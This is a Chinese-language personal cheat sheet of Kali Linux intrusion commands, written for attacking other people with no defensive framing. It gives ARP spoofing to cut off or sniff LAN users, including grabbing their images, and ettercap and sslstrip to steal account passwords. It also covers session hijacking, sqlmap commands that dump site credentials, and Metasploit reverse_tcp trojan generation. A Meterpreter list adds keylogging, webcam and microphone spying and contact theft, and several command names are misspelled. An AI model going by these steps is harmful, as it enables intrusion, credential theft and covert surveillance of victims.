kail 入门

 

ail 入侵入门

 

1. KDE 桌面安装          apt-get install kde-full
1. apt-get -f  install kalgebra kde-runtime phonon
2. apt-get -f  install  python-kde4  kdepim-runtime akonadi-server
3. apt-get  -f install kdemultimedia juk libtag1c2a
4. apt-get  -f install libqt4-sql=4:4.8.2+dfsg-11 libqtcore4=4:4.8.2+dfsg-11
2. sqlmap  明小子
3. ettercap  欺骗工具
4. 局域网断网攻击。
1. arpspoof -i 网卡 -t 目标 IP 网关 
2. fping -asp  192.168.1.0/24
5. 获取内网妹子相册
1. arp欺骗 目标流量会经过我的网卡，会通过网关出去
2. arp断网 目标流量会经过我的网卡
6. 进行ip 流量转发 echo 1>/proc/sys/ipv4/ip_forward
1. drifnet -i 网卡
7. 综合应用HTTP 账号密码获取
1. ettercap  => DNS 欺骗 流量嗅探
2. ettercap -Tq -i eth0
3. -T 文本 -q安静模式。
8. 获取HTTPS 账号密码
1. sslstrip -sfk   破解https
9. 会话劫持
1. arpspoof arg欺骗
2. wrieshark    抓包 
3. ferret           重新生成抓包工具
4. hamster     重放流量
5. ferret -r cookie
6. hasmster 重放流量改代理。
10.  没有ferret 安装教程 
1. git clone https://github.com/oulyong/ferret
2. mkdir bin tmp 
3. vim src/ pixie.c
4. 注释679 701
5. make
11. asp 网站 大多数使用access 
1. asp  MSSQL
2. sqlmap -u “网站名”                     查看是否存在sql漏洞
3. sqlmap -u “网站名”--tables         拆解所有表名
4. sqlmap -u “网站名”--colums  -T  "表名"  通过表名找列项
5. sqlmap -u “网站名" --dump -  C  "username,password" -T "表名" 下载数据
12. php 网站
1. sqlmap -u "网站名" --is-dba 是不是dba
2. sqlmap -u "网站名" --dbs      列出所有数据库
3. sqlmap -u "网站名" --current-db     列出当前数据库
4. sqlmap -u "网站名" --tables -D  "数据库名字" 列出当前数据库数据表
5. sqlmap -u "网站名" --colums -T "表名"  -D  "数据库名字"  找数据列
13. cookie 注入 
1. sqlmap -u "网站名" --cookie " "
14. Metasloit 教程
1. csfconsle
2. exploit 模块 漏洞利用
3. payloads shellcode 漏洞利用后执行代码
4. use 模块
5. show options  
15. 木马程序：  控制端 -- 服务端

                        控制远程          木马程序

1. 根据自己 ip 生成木马
2. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=55555 X > test.exe           
3. use exploit/multi/handler    使用handler这个模块 
4. set PAYLOAD windows/meterpreter/reverse_tcp
5. 使用这个shellcode  
1. backgroud 后台
2. sessions -i  id 启动哪个会话。
3. 注入 pid 进程              
4. migrate XXX    注入id 下面那个pid
5. 7564   7520   explorer.exe   桌面进程
6. run vnc 开启远程桌面
7. 文件管理功能 

 　　这里我说一下 自从 2015年起kail 取消了payload 因为不免杀，所以更新了新结合工具。

msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

• download      Download a file or directory
• upload        Upload a file or directory
• arp        arp表

 

•     enumdesktops   List all accessible desktops and window stations   窗体列表      
•     keyscan_dump   Dump the keystroke buffer                                    键盘记录下载
•     keyscan_start  Start capturing keystrokes                                        键盘记录
•     keyscan_stop   Stop capturing keystrokes                                    
•     screenshot     Grab a screenshot of the interactive desktop            截屏
•     uictl          Control some of the user interface components             获取鼠标键盘控制权
• Stdapi: Webcam Commands
• =======================
•     Command        Description
•     -------        -----------
•     record_mic     Record audio from the default microphone for X seconds   音频录制
•     webcam_chat    Start a video chat                                                        开启视频
•     webcam_list    List webcams                                                                列举摄像头
•     webcam_snap    Take a snapshot from the specified webcam           使用摄像头拍照
•     webcam_stream  Play a video stream from the specified webcam    网页视频
• check_root     检测ROOT
• dump_calllog    下载电话记录
• dump_contacts   下载信息记录
• Geolocate      定位
•  
• MS12 020  漏洞。
• auxiliary/scanner/rdp/ms12_020_check  
• auxiliary/dos/windows/rdp/ms12_020_maxchannelids
• PHP 
• msfpayload php/meterpreter/reverse_tcp LHOST=192.168.199.209 R > web.php   

 

 

 

http://www.huo119.com/post/909.shtm

 

不定时更新，笔记只有我能看懂，